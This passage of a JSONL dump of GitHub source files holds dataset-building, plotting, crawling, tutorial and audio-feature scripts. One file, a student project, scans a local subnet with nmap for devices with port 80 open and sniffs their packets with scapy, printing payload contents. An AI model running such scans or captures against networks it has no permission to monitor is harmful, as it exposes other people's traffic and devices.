len(convention_tokenize(segment[1]))\n else:\n len_item['code'] += len(convention_tokenize(segment[1]))\n len_item['total'] = len_item['text'] + len_item['code']\n if len_item['total'] > 1000:\n continue\n raw_title = line_json['row']['@Title']\n line_json['row']['@Title'] = ''.join([i if ord(i) < 128 else ' ' for i in raw_title])\n line_json_str = json.dumps(line_json['row'])\n result.append(f'{line_json_str}\\n')\n if len(result) == BATCH_SIZE:\n write_lines(result, target_path)\n result.clear()\n t.close()\n if result:\n write_lines(result, target_path)\n print(f'blank lines: {blank_lines}, only_code: {only_code}, only_text: {only_text}')\n\ndef use_attr_extractor():\n '''\n mainly used to filter for high-quality questions; input and output are both xml files\n '''\n language_all_path = './data/dataset/all/{}-all.xml'\n # for language in ['go', 'javascript', 'python', 'c#', 'php', 'ruby', 'java']:\n # '''extract by condition and create a new file'''\n # TAG = f'<{language}>'\n # filters = [TAG]\n # include_extractor(source_path, language_all_path.format(language), filters, total_lines)\n for language, total_lines in [\n # ('go', 50355), ('python', 1597777), ('c#', 1450789), ('php', 1381587), ('ruby', 216776), ('java', 1735380), ('javascript', 2130667)\n ('java', 1735380)\n ]:\n '''count the distribution of answer counts for the language file'''\n print(f'------------{language}------------')\n condition = lambda x: int(x['@Score']) >= 1 and '@AcceptedAnswerId' in x and '@ClosedDate' not in x and int(x['@AnswerCount']) >= 1\n attr_extractor(language_all_path.format(language), './data/dataset/all/java-a1-s1.xml', condition, total_lines)\n # attr_counter(language_all_path.format(language), '@AnswerCount', total_lines, condition)\n # time_counter( './data/dataset/java-a3-s3-no-code.xml', 81123)\n\ndef use_content_extractor():\n '''\n mainly used to filter out content that is not text+code, fails the length requirement, or duplicates other language tags; input is xml, output is json\n '''\n # source_path = './data/dataset/all/python-a1-s2.xml'\n # target_path = './data/dataset/all/python-a1-s2-len-lte-1000-only-text.jsonl'\n # python_lines = 267717\n # content_extractor(source_path, target_path, python_lines, 'python')\n # used to see how the number of posts without code is distributed over time\n # time_counter(target_path, 27093)\n # content_counter(source_path, python_lines, 'python')\n source_path = './data/dataset/all/java-a1-s1.xml'\n target_path = './data/dataset/all/java-a1-s1-len-lte-1000.jsonl'\n java_lines = 462244\n content_extractor(source_path, target_path, java_lines, 'java')\n\ndef token_len_counter(source_path, total_len):\n '''\n count the token length of each post body, computing the text and code lengths separately\n finally produce percentiles: total-length percentiles, text-length percentiles, code-length percentiles\n '''\n # tokenizer = RobertaTokenizer.from_pretrained('microsoft/codebert-base', do_lower_case=False)\n result = []\n with open(source_path, 'r', encoding='utf-8') as f:\n t = tqdm(total=total_len)\n for line in f:\n t.update(1)\n line_json = json.loads(line)\n body_content = line_json['@Body']\n len_item = {\n 'total': 0,\n 'text': 0,\n 'code': 0\n }\n for segment in body_content:\n if segment[0] == 'text':\n # len_item['text'] += len(tokenizer.tokenize(segment[1]))\n len_item['text'] += len(convention_tokenize(segment[1]))\n else:\n # len_item['code'] += len(tokenizer.tokenize(segment[1]))\n len_item['code'] += len(convention_tokenize(segment[1]))\n len_item['total'] = len_item['text'] + len_item['code']\n result.append(len_item)\n t.close()\n total_lens = np.array([item['total'] for item in result])\n text_lens = np.array([item['text'] for item in result])\n code_lens = np.array([item['code'] for item in result])\n for label, x in [('total', total_lens)]:\n # for label, x in [('text', text_lens), ('code', code_lens), ('total', total_lens)]:\n print(label)\n for percent in [0, 2, 3, 5, 7, 9, 50, 85, 86, 87, 88, 89, 90, 95, 100]:\n print('{} percent - len {}'.format(percent, np.percentile(x, percent)))\n # plot_histogram(x, 50)\n\ndef construct_3_datasets(source_path, total_len):\n # get the line ids for each dataset split\n # test_size = total_len // 10\n total_size = 40000\n test_size = 2000\n np.random.seed(999)\n total_line_ids = np.arange(total_len)\n total_line_ids_new = np.random.choice(total_line_ids, total_size, replace=False)\n test_ids = np.random.choice(total_line_ids_new, test_size, replace=False)\n total_line_ids = np.setdiff1d(total_line_ids_new, test_ids)\n valid_ids = np.random.choice(total_line_ids, test_size, replace=False)\n # write out the data\n train_path = source_path.replace('.jsonl', '.train.jsonl')\n test_path = source_path.replace('.jsonl', '.test.jsonl')\n valid_path = source_path.replace('.jsonl', '.valid.jsonl')\n\n test_len = 0\n valid_len = 0\n train_len = 0\n with open(source_path, 'r', encoding='utf-8') as f:\n t = tqdm(total=total_len)\n line_id = 0\n for line in f:\n write_path = None\n t.update(1)\n if line_id in test_ids:\n test_len += 1\n write_path = test_path\n elif line_id in valid_ids:\n valid_len += 1\n write_path = valid_path\n elif line_id in total_line_ids_new:\n train_len += 1\n write_path = train_path\n else:\n line_id += 1\n continue\n write_lines([line], write_path)\n line_id += 1\n t.close()\n print(\"expected: {}-{}\".format(len(valid_ids), len(test_ids)))\n print(\"{}-{}-{}\".format(test_len, valid_len, train_len))\n\ndef construct_3_datasets_by_date(source_path, total_len, start_line, end_line):\n # write out the data; source_path is a json file\n train_path = source_path.replace('.jsonl', '.train.jsonl')\n test_path = source_path.replace('.jsonl', '.test.jsonl')\n valid_path = source_path.replace('.jsonl', '.valid.jsonl')\n\n test_len = 0\n valid_len = 0\n train_len = 0\n\n total_lines_for_test = end_line - start_line + 1\n test_size = total_lines_for_test // 2\n valid_size = total_lines_for_test - test_size\n total_line_ids = np.arange(start_line, end_line+1)\n test_ids = np.random.choice(total_line_ids, test_size, replace=False)\n total_line_ids = set(total_line_ids)\n test_ids = set(test_ids)\n valid_ids = total_line_ids - test_ids\n\n with open(source_path, 'r', encoding='utf-8') as f:\n t = tqdm(total=total_len)\n line_id = 1\n write_path = None\n for line in f:\n t.update(1)\n if line_id in test_ids:\n test_len += 1\n write_path = test_path\n elif line_id in valid_ids:\n valid_len += 1\n write_path = valid_path\n else:\n train_len += 1\n write_path = train_path\n write_lines([line], write_path)\n line_id += 1\n t.close()\n print(\"expected: {}-{}\".format(len(valid_ids), len(test_ids)))\n print(\"{}-{}-{}\".format(test_len, valid_len, train_len))\n\n\ndef attr_counter_2(source_path, condition_func):\n '''\n read a jsonl file\n count the total number of lines and the number of lines we care about\n '''\n total_count = 0\n condition_count = 0\n with open(source_path, 'r', encoding='utf-8') as f:\n for line in f:\n total_count += 1\n if condition_func(json.loads(line)):\n condition_count += 1\n print(f'{source_path} total {total_count} lines')\n print(f'{source_path} conditioned {condition_count} lines')\n\ndef interrogative_counter():\n source_path = './data/dataset/all/python-a3-s2-len-lte-1000.jsonl'\n def function(json_data):\n target = ['how', 'what', 'why', 'which', 'when']\n title = json_data['@Title'].lower()\n for i in target:\n if i in title:\n return True\n return False\n attr_counter_2(source_path, function)\n\nif __name__ == '__main__':\n # use_content_extractor()\n # use_attr_extractor()\n source_path = './data/dataset/all/java-a1-s1-len-lte-1000-match-gao-code-only.jsonl'\n # source_path = './data/dataset/all/java-a1-s1-len-lte-1000-match-gao.jsonl'\n # java_lines = 63056\n # construct_3_datasets(source_path, 54289)\n # construct_3_datasets_by_date('./data/dataset/all/python-a1-s2-len-lte-1000.jsonl', 225906, 211537, 225906)\n source_path = './data/dataset/all/python-a3-s2-len-lte-1000.jsonl'\n python_lines = 66439\n # construct_3_datasets(source_path, python_lines)\n # token_len_counter(source_path, 
python_lines)\n # interrogative_counter()\n ","repo_name":"zfj1998/XXSO_Data_Toolkit","sub_path":"dataset_construct.py","file_name":"dataset_construct.py","file_ext":"py","file_size_in_byte":21093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"21243136431","text":"import unittest\nfrom zeppos_ms_sql_server_proxy.extract_to_csv import ExtractToCsv\n\n\nclass TestTheProjectMethods(unittest.TestCase):\n def test_get_execute_methods(self):\n extract_to_csv = ExtractToCsv.execute(\n connection_string=\"DRIVER={ODBC Driver 17 for SQL Server}; SERVER=localhost\\sqlexpress; DATABASE=master; Trusted_Connection=yes;App=Test;\",\n sql_statement=\"select * from information_schema.columns\",\n csv_root_directory=r\"c:\\temp\\ms_sql_server_proxy\",\n csv_file_name=\"test_file.csv\"\n )\n self.assertEqual(201, extract_to_csv.status_code)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"changrunner/zeppos_ms_sql_server_proxy","sub_path":"tests/test_extract_to_csv.py","file_name":"test_extract_to_csv.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"23833617189","text":"#-*- coding: utf-8 -*-\n\n# Example of Error\n\"\"\"\n2013 * (1229/0)\n=> ZeroDivisionError: division by zero\nopen('notfind.txt', 'r')\n=> FileNotFoundError: [Errno 2] No such file or directory: 'notfind.txt'\nlst = [1, 2, 3, 4]\nprint(lst[5])\n=> IndexError: list index out of range\n\"\"\"\n\n# try ~ except\ntry:\n b = 10 / 0\nexcept ZeroDivisionError:\n print('제수는 0이 될 수 없습니다!')\n'''\n제수는 0이 될 수 없습니다!\n'''\n\ntry:\n a = int(input(\"첫번째 숫자를 입력하세요: \"))\n b = int(input(\"두번째 숫자를 입력하세요: \"))\n print(\"a + b = \", a + b)\nexcept ValueError:\n print('값이 적절하지 않습니다.')\n'''\n첫번째 숫자를 입력하세요: 1\n두번째 숫자를 입력하세요: 영\n값이 적절하지 않습니다.\n'''\n\ntry:\n a = int(input(\"피제수를 입력하세요: \"))\n b = int(input(\"제수를 입력하세요: \"))\n print(\"a / b = \", a / b)\nexcept (ValueError, ZeroDivisionError):\n print('제수가 0이거나 값이 적절하지 않습니다.')\n'''\n피제수를 입력하세요: 4\n제수를 입력하세요: 영\n제수가 0이거나 값이 적절하지 않습니다.\n'''\n\"\"\"\ntry:\n a = 50 / \"이십\"\nexcept TypeError as e:\n print('예외 처리 결과 :', e.args[0]\n\n=> 예외 처리 결과 : unsupported operand type(s) for /: 'int' and 'str'\n\"\"\"\n\n# else : 예외가 발생하지 않을 경우 실행\ntry:\n f = open('gugudan.txt', 'r')\nexcept IOError:\n print('파일을 열지 못했습니다.')\nelse:\n print('gugudan.txt:\\n', f.read())\n f.close()\n'''\ngugudan.txt:\n 2 * 1 = 2\n2 * 2 = 4\n2 * 3 = 6\n2 * 4 = 8\n2 * 5 = 10\n2 * 6 = 12\n2 * 7 = 14\n2 * 8 = 16\n2 * 9 = 18\n'''\n\n# finally : 예외 발생 여부와 상관없이 무조건 실행\ntry:\n a = 10 / 0\nexcept ZeroDivisionError:\n print('제수는 0이 될 수 없습니다!')\nfinally:\n print('무조건 실행되는 영역!')\n'''\n제수는 0이 될 수 없습니다!\n무조건 실행되는 영역!\n'''\n\n# raise : 의도적으로 개발자가 예외를 발생시켜야 할 경우 raise 구문을 통하여 해당하는 예외를 강제로 발생\ntry:\n a = int(input('피제수를 입력하세요: '))\n b = int(input('제수를 입력하세요: '))\n if a <= 0 or b <= 0:\n raise ArithmeticError('피제수 혹은 제수가 0 이하일 수 없습니다.')\nexcept ArithmeticError as e:\n print('예외 발생:', e.args[0])\n'''\n피제수를 입력하세요: 2\n제수를 입력하세요: 0\n예외 발생: 피제수 혹은 제수가 0 이하일 수 없습니다.\n'''\n","repo_name":"BKJang/I-Studied","sub_path":"Python/17_Exception.py","file_name":"17_Exception.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"74682493030","text":"import sys\r\nimport nmap\r\nimport time\r\nimport os\r\nfrom scapy.all import *\r\n\r\npacket_count = 0\r\n\r\nnm = nmap.PortScanner() # 네트워크 스캐너를 사용하여 iot 
기기의 IP 주소를 스캔\r\nnm.scan(\"192.168.35.0/24\") # 네트워크 주소 범위 지정\r\n\r\n# iot 기기의 IP 주소 선택\r\niot_ip = None\r\nfor host in nm.all_hosts():\r\n # iot 기기의 특정 포트 번호가 열려있는지 확인\r\n if nm[host].has_tcp(80) and nm[host][\"tcp\"][80][\"state\"] == \"open\":\r\n iot_ip = host\r\n break\r\n\r\nif iot_ip is None:\r\n print(\"IoT 기기를 찾을 수 없습니다.\")\r\nelse:\r\n print(\"IoT 기기의 IP 주소: \", iot_ip)\r\n\r\ndef handle_packet(packet):\r\n global packet_count\r\n src = packet[IP].src\r\n dst = packet[IP].dst\r\n length = packet[IP].len\r\n checksum = packet[IP].chksum\r\n \r\n if packet.haslayer(TCP):\r\n # TCP packet analysis code\r\n sport = packet[TCP].sport\r\n dport = packet[TCP].dport\r\n data = packet[TCP].payload.load if hasattr(packet[TCP].payload, 'load') else b'' # Check if payload exists\r\n print(f\"TCP packet: source={src}, source_port={sport}, destination={dst}, destination_port={dport}, length={length}, checksum={checksum}, data={data}\")\r\n packet_count += 1\r\n\r\n if packet.haslayer(UDP):\r\n # UDP packet analysis code\r\n sport = packet[UDP].sport\r\n dport = packet[UDP].dport\r\n data = packet[UDP].payload.load if hasattr(packet[UDP].payload, 'load') else b'' # Check if payload exists\r\n print(f\"UDP packet: source={src}, source_port={sport}, destination={dst}, destination_port={dport}, length={length}, checksum={checksum}, data={data}\")\r\n packet_count += 1\r\n\r\n\r\nsniffingTime = input(\"Sniffing Time: \") # 몇 초간 패킷 캡쳐할 것인지\r\nif iot_ip:\r\n print(\"프로그램 시작\")\r\n # pcap_file = sniff(prn=handle_packet, timeout=int(sniffingTime), filter=f\"host {iot_ip}\")\r\n sniff(prn=handle_packet, timeout=int(sniffingTime), filter=f\"host {iot_ip}\")\r\n print(\"Finish Capture Packet\")\r\n if packet_count == 0: # No packets captured\r\n print(\"No Packet\")\r\n sys.exit()\r\n else:\r\n packet_rate = packet_count / float(sniffingTime)\r\n print(\"Total Packet: %s\" % packet_count)\r\n print(\"Packets per second: %.2f\" % packet_rate)\r\n # file_name = input(\"Enter File Name: \")\r\n # wrpcap(file_name, pcap_file) # Save as a pcap file\r\n\r\nelse:\r\n print(\"프로그램을 실행할 수 없습니다.\")\r\n\r\n# pcap 파일 읽어서 패킷 크기 구하기\r\n'''\r\ndef getSize(file_name):\r\n packets = rdpcap(file_name)\r\n packet_size = [len(packet) for packet in packets]\r\n return packet_size\r\n \r\npacketSize = getSize(file_name)\r\ntotalSize = sum(packetSize)\r\nbyte_rate = totalsize / float(sniffingTime)\r\nprint(f\"Total Packet Size: %s\" % totalSize)\r\nprint(f\"Packet Size per Second: %.2f bytes/sec\" % byte_rate)\r\n'''\r\n \r\n\r\n","repo_name":"326eunjin/network_programming","sub_path":"project2.py","file_name":"project2.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"36801625588","text":"from datetime import datetime\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\n\nd = datetime.today()\ndriver = webdriver.Chrome(r'C:\\Users\\hwans\\Develop\\Python\\crawling\\chromedriver.exe')\n\nfile_path = f'C:/Users/hwans/Develop/Python/crawling/교보문고 베스트셀러 {d.year}_{d.month}_{d.day}.html'\n\n\ndriver.get('http://www.kyobobook.co.kr/index.laf')\ndriver.find_element_by_xpath('//*[@id=\"header\"]/div[3]/ul[2]/li[1]/a').click();\n\nsrc = driver.page_source\nsoup = BeautifulSoup(src,'html.parser')\ndiv_list = soup.find_all('div',class_='detail')\n\n \nwith open(file_path,'w') as f:\n f.write('')\n f.write('')\n f.write('')\n f.write('교보문고 베스트셀러 1~20위')\n f.write('')\n f.write('')\n f.write('')\n f.write('교보문고 베스트셀러 1~20위
</h1>')\n rank = 0\n for div in div_list:\n rank+=1\n f.write('')\n f.write(f'순위: {rank}<br>')\n book = div.find('div', class_='title')\n book_link = book.find('a')\n f.write(f'{book_link}')\n f.write('<br><br><br>
')\n f.write('')\n f.write('')","repo_name":"hwans21/python","sub_path":"Day06/kyobo_url.py","file_name":"kyobo_url.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"26478508581","text":"from collections import deque\ndef solution(cacheSize, cities):\n answer = 0\n q = deque(maxlen=cacheSize)\n if cacheSize == 0:\n answer = 5 * len(cities)\n else:\n for i in range(len(cities)):\n # q안에 이미 있으면 빼주기\n if cities[i].lower() in q:\n q.remove(cities[i].lower())\n q.append(cities[i].lower())\n answer += 1\n continue\n else:\n q.append(cities[i].lower())\n answer += 5\n print(answer)\n return answer\nsolution(3, [\"Jeju\", \"Pangyo\", \"Seoul\", \"Jeju\", \"Pangyo\", \"Seoul\", \"Jeju\", \"Pangyo\", \"Seoul\"])","repo_name":"HyeseungNA/algorithm_prac","sub_path":"programmers/17680.py","file_name":"17680.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"31591224613","text":"import utils.freq_sweep as freq_sweep\n\n# FREQ SWEEP PARAMETERS\nsweep_time = 3 # frequency sweep lasts 3 seconds\nmin_freq = 20 # 20Hz\nmax_freq = 20000 # 20kHz\nsampling_rate = 100000 # 100kHz\n\ndef main():\n freq_sweep.plot_all_sweeps(sweep_time, sampling_rate, min_freq, max_freq)\n\nmain()","repo_name":"shreya-51/MScAML_group_project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"69987927911","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport numpy as np\nimport seaborn as sns\nimport geopandas as gpd\nfrom IPython.display import Image\nfrom bokeh.plotting import figure, output_notebook, show, output_file\nfrom bokeh.io import output_notebook, output_file\nfrom bokeh.models import ColumnDataSource, HoverTool, CustomJS\nfrom bokeh.models.widgets import Select\nfrom bokeh.transform import factor_cmap\nfrom bokeh.layouts import column as bokeh_column\nfrom bokeh.models import TabPanel\nfrom bokeh.models import Legend\nfrom country_name import *\n\n# Load and preprocess data\ndf = pd.read_csv('data/clean_combined.csv')\n\n# Filter and reshape data for 'World'\ndf_world = df[df['Entity'] == 'World']\ndf_world = df_world.melt(id_vars=['Entity', 'Code', 'Year'], \n value_vars=['Cropland', 'Pasture', 'Permanent ice', 'Semi-natural land', 'Urban', 'Villages', 'Wild barren land', 'Wild woodlands'], \n var_name='Land_type', \n value_name='Area_Aggregated_Categories')\n\n# Drop rows with NaN values\ndf_world = df_world.dropna(subset=['Area_Aggregated_Categories'])\n\n\ndf_world['Year'] = df_world['Year'].astype(int)\n\n# Group and pivot data\ndf_world = df_world[df_world['Year'] >= 200]\ndf_world = df_world.groupby(['Year', 'Land_type'])['Area_Aggregated_Categories'].sum().reset_index()\ndf_world = df_world.pivot(index='Year', columns='Land_type', values='Area_Aggregated_Categories').fillna(0)\n\n# Convert to percentages\ndf_world = df_world.divide(df_world.sum(axis=1), axis=0) * 100\n\n# Plot chart 1\n# Define a custom color palette using hex color codes\ncustom_palette = {\n 'Cropland': '#FF8D85', # Dark orange\n 'Pasture': '#B22222', # Firebrick\n 'Wild barren land': '#FFD700', # Gold\n 'Permanent ice': '#4073FF', # Light sky blue\n 'Wild woodlands': '#064E40', # Forest green\n 'Semi-natural land':'#6ACCBC', \n 'Urban': 
'#808080', # Gray\n 'Villages': '#804000' # Gray\n}\n\n# Create a new figure\nplt.figure(figsize=(16, 9))\n#plt.suptitle('Chart 1', fontsize=20, y=1.03)\n\n\n# Initialize a variable to store the cumulative sum\ncumulative_sum = np.zeros_like(df_world.iloc[:, 0])\n\n# Plot a stacked area chart\nfor column in df_world.columns:\n plt.fill_between(df_world.index, cumulative_sum, cumulative_sum + df_world[column], color=custom_palette.get(column, 'lightgray'), alpha=0.4)\n cumulative_sum += df_world[column]\n \n# Set labels and title\nplt.xlabel('Year', fontsize=14)\nplt.ylabel('Percentage of Total Land Mass (%)', fontsize=14)\nplt.title('Change in Global Land Use Over Time (AD 200 to Present)', fontsize=16)\n\nplt.grid(True)\nplt.legend(df_world.columns, loc='upper left')\n\nplt.show()\n\n\nprint(\"earth habitable land area\")\nImage(url= \"image/earth.jpeg\", width=800, height=700)\n\n# Load photo\nagriculture_data = pd.read_csv('data/habitable-land-needed.csv')\nworld_map = gpd.read_file('image/ne_10m_admin_0_countries.shp')\n\n\nworld_map['SOVEREIGNT'] = world_map['SOVEREIGNT'].replace(country_name_corrections)\n\n# Remove leading/trailing spaces\nworld_map['SOVEREIGNT'] = world_map['SOVEREIGNT'].str.strip()\nagriculture_data['Entity'] = agriculture_data['Entity'].str.strip()\n\n# Separate 'World' data\nworld_data = agriculture_data[agriculture_data['Entity'] == 'World']\ncountry_data = agriculture_data[agriculture_data['Entity'] != 'World']\n\n\n# Add missing countries\nmissing_countries_df = pd.DataFrame(missing_countries, columns=['Entity'])\nmissing_countries_df['HALF Index (habitable land area) (Alexander et al. (2016))'] = np.nan\nagriculture_data = pd.concat([agriculture_data, missing_countries_df], ignore_index=True)\n\n\n# Merge dataframes\nmerged_data = world_map.merge(agriculture_data, how='left', left_on='SOVEREIGNT', right_on='Entity')\n\n# Include 'World' data\nworld = pd.concat([merged_data, world_data])\n\n# Calculate world average\nworld_average = world_data['HALF Index (habitable land area) (Alexander et al. (2016))'].values[0]\n\n# Add the title and the description\n# plt.suptitle(\"Share of global habitable land needed if everyone had the diet of...\", fontsize=14, fontweight='bold')\n\nprint(\"Share of global habitable land needed if everyone had the diet of...\")\n# Assign color categories\nworld['color_category'] = np.where(\n world['HALF Index (habitable land area) (Alexander et al. (2016))'].isnull(), 'no_data',\n np.where(world['HALF Index (habitable land area) (Alexander et al. (2016))'] < world_average, 'blue',\n np.where(world['HALF Index (habitable land area) (Alexander et al. 
(2016))'] <= 99, 'yellow', 'red')))\n\n# Map color categories to actual colors\ncolor_mappings = {'blue': '#96ceb4', 'yellow': '#ff9966', 'red': '#d9534f', 'no_data': '#7f7f7f'}\nworld['color'] = world['color_category'].map(color_mappings)\n\n# Plot\nfig, ax = plt.subplots(1, 1, figsize=(10, 10))\nworld[world['color_category'] != 'no_data'].geometry.plot(facecolor=world[world['color_category'] != 'no_data']['color'], ax=ax)\nworld[world['color_category'] == 'no_data'].geometry.plot(facecolor='none', edgecolor='grey', hatch='////', ax=ax)\n\n# Legend\nlegend_labels = {\n '#96ceb4': 'Less than currently used',\n '#ff9966': 'Greater than currently used',\n '#d9534f': 'Not possible with global land',\n 'grey': 'No data'\n}\nlegend_handles = [mpatches.Patch(color=color, label=label, hatch='////' if color == 'grey' else None) for color, label in legend_labels.items()]\nplt.legend(legend_handles, legend_labels.values(), title='HALF Index (habitable land area)', loc='lower right')\n\n# Remove x and y axis marks\nax.set_xticks([])\nax.set_yticks([])\n\nplt.show()\n\n# Ensure output_notebook() is called in the same cell\n# output_notebook()\noutput_file(\"output_plot.html\")\n\n# Create 'Proportion Allocated to Animal Feed' and 'Proportion Allocated to Other Uses' columns\ndf['Total Cereal Allocation'] = df[['Cereals allocated to other uses', 'Cereals allocated to animal feed', 'Cereals allocated to human food']].sum(axis=1)\ndf['Proportion Allocated to Human Food'] = df['Cereals allocated to human food'] / df['Total Cereal Allocation']\ndf['Proportion Allocated to Animal Feed'] = df['Cereals allocated to animal feed'] / df['Total Cereal Allocation']\ndf['Proportion Allocated to Other Uses'] = df['Cereals allocated to other uses'] / df['Total Cereal Allocation']\n\n# Convert proportions to percentages\nfor column in ['Proportion Allocated to Human Food', 'Proportion Allocated to Animal Feed', 'Proportion Allocated to Other Uses']:\n df[column] *= 100\n\n# Filter the DataFrame\ndf_large_population = df[~df['Entity'].isin(small_population_countries)]\n\n# Get column names\ncolumn_names = df_large_population.columns.tolist()\n\n# Remove rows with missing values in relevant columns\ndf_remove_na = df_large_population.dropna(subset=['Cereals allocated to other uses', \n 'Cereals allocated to animal feed', \n 'Cereals allocated to human food', 'Year', 'Entity'])\n\ndf_clean = df_remove_na.drop(['Cropland',\n 'Pasture',\n 'Permanent ice',\n 'Semi-natural land',\n 'Urban',\n 'Villages',\n 'Wild barren land',\n 'Wild woodlands'], axis=1)\n\n# Convert 'Year' to int\ndf_clean['Year'] = df_clean['Year'].astype(int)\n\n\n# Create a list of unique countries\ncountries = df_clean['Entity'].unique()\n\n\n\n# Create a ColumnDataSource for each country\nsources = {country: ColumnDataSource(df_clean[df_clean['Entity'] == country]) for country in countries}\n\n# Create the initial figure\np = figure(width=1000, height=500, x_axis_type=\"linear\", title=countries[0])\np.xaxis.axis_label = 'Year'\np.yaxis.axis_label = 'Cereal Allocation (%)'\n\n# Define the stack order and colors\nstacks = ['Proportion Allocated to Human Food', 'Proportion Allocated to Animal Feed', 'Proportion Allocated to Other Uses']\n# Define a custom color palette\ncolors = [\"#FFB6C1\", \"#9370DB\", \"#ADD8E6\"]\nlegend_labels = ['Human Food', 'Animal Feed', 'Other Uses']\n\n\n# Add varea_stack to the plot\nrenderers = p.varea_stack(stacks, x='Year', color=colors, alpha=0.6, source=sources[countries[0]])\n\n# Create a Legend\nlegend = 
Legend(items=[(label, [r]) for label, r in zip(legend_labels, renderers)], location=\"top_left\", click_policy=\"hide\")\n\n# Add the legend to the plot\np.add_layout(legend)\n\n\nhover = HoverTool(\n tooltips=[\n (\"Year\", \"@Year\"),\n (\"Human Food (%)\", \"@{Proportion Allocated to Human Food}\"),\n (\"Animal Feed (%)\", \"@{Proportion Allocated to Animal Feed}\"),\n (\"Other Uses (%)\", \"@{Proportion Allocated to Other Uses}\")\n ]\n)\np.add_tools(hover)\n\n# Create a Select widget for country selection\ncountry_select = Select(value=countries[0], options=list(countries))\n\n# Define a CustomJS callback for the Select widget\ncallback = CustomJS(args=dict(sources=sources, plot=p), code=\"\"\"\n var country = cb_obj.value;\n plot.title.text = country;\n plot.renderers[0].data_source.data = sources[country].data;\n plot.change.emit();\n\"\"\")\ncountry_select.js_on_change('value', callback)\n\n# Show the plot and the Select widget\nshow(bokeh_column(country_select, p))\n\nprint(\" In Europe less than one-third of cereal production is used for human consumption, and in the US only 10 percent is.\")\n","repo_name":"Niveusgh/Global-Land-Change","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"19756037001","text":"#coding=utf-8\n# File : cut_mfcc.py\n# Time : 2021/09/03 14:18:55\n# Author : Jinghan Peng\n# Desciption: 根据feats.scp和target.lst,切割特征,生成新的feat和target的ark和scp\n\n\nimport os\nimport kaldiio\nimport kaldi_io\nimport numpy as np\nfrom tqdm import tqdm\nimport collections\n\ndef main():\n featsscp_path = \"/data/pengjinghan/origin_data/mandarin/1c_8kHz_audio/mfcc/data/feats.scp\"\n targetlst_path = \"/data/pengjinghan/origin_data/mandarin/1c_8kHz_audio/target.lst\"\n out_dir = \"/data/pengjinghan/tsvad/segment\"\n \n os.makedirs(out_dir, exist_ok=True)\n\n segment_size = 1600 # 16秒 = 1600帧\n \n \"\"\"读取target.lst\"\"\"\n utt2target = collections.defaultdict(dict)\n with open(targetlst_path, 'r') as rf:\n for line in tqdm(rf.readlines()):\n line = line.strip().split()\n spk = line[0]\n utt = spk[:spk.rfind('_')]\n target = [int(i) for i in line[1:]]\n target = np.array(target, dtype='float32')\n utt2target[utt][spk] = target\n\n \"\"\"读取feats.scp,进行切割并写入ark和scp\"\"\"\n feat_ark_scp = f'ark:| copy-feats --compress=true ark:- ark,scp:{out_dir}/feats.ark,{out_dir}/feats.scp'\n target_ark_scp = f'ark:| copy-feats --compress=true ark:- ark,scp:{out_dir}/target.ark,{out_dir}/target.scp'\n\n with open(featsscp_path, 'r') as rf, \\\n kaldi_io.open_or_fd(feat_ark_scp, 'w') as wf1, \\\n kaldi_io.open_or_fd(target_ark_scp, 'w') as wf2:\n for line in tqdm(rf.readlines()):\n utt, path = line.strip().split()\n feat = kaldiio.load_mat(path)\n nframes = feat.shape[0]\n\n target = utt2target[utt]\n spks = list(target.keys())\n \n steps = nframes//segment_size\n for i in range(steps):\n frame_str = \"{:>06}_{:>06}\".format(i*segment_size, (i+1)*segment_size)\n # 特征\n new_feat_utt = f\"{utt}-{frame_str}\" \n segment_feat = feat[i*segment_size:(i+1)*segment_size]\n kaldi_io.write_mat(wf1, segment_feat, key=new_feat_utt)\n\n # 标签\n for spk in spks:\n new_target_utt = f\"{spk}-{frame_str}\"\n segment_target = np.expand_dims(target[spk][i*segment_size:(i+1)*segment_size], 0) # kaldi的ark必须是2维numpy\n kaldi_io.write_mat(wf2, segment_target, key=new_target_utt)\n\n # \"\"\"查看ark\"\"\"\n # /data/liumin/speakin-kaldi/src/featbin/copy-feats ark:target.ark ark,t:- | 
less\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"NeoBryant/audio_tools","sub_path":"tsvad/cut_feats.py","file_name":"cut_feats.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"41558621592","text":"\"\"\"Modelling craft failure using Bayesian Belief Network.\n\nThomas Dickson\nthomas.dickson@soton.ac.uk\n22/05/2018\n\"\"\"\n\nfrom pgmpy.models import BayesianModel\nfrom pgmpy.factors.discrete import TabularCPD\nfrom pgmpy.inference import BeliefPropagation\nfrom numba import jit\n\n\n@jit(fastmath=True, nopython=True, cache=True)\ndef wind_speed(tws):\n \"\"\"Wind speed failure function.\"\"\"\n if tws > 25:\n return 1\n else:\n return 0\n\n\n@jit(fastmath=True, nopython=True, cache=True)\ndef wind_dir(twa):\n \"\"\"Wind direction failure function.\"\"\"\n if twa < 0.0:\n return 1\n else:\n return 0\n\n\n@jit(fastmath=True, nopython=True, cache=True)\ndef wave_height(h):\n \"\"\"Wave height failure function.\"\"\"\n if h > 3:\n return 1\n else:\n return 0\n\n\n@jit(fastmath=True, nopython=True, cache=True)\ndef wave_dir(theta):\n \"\"\"Wave direction failure function.\"\"\"\n if theta < 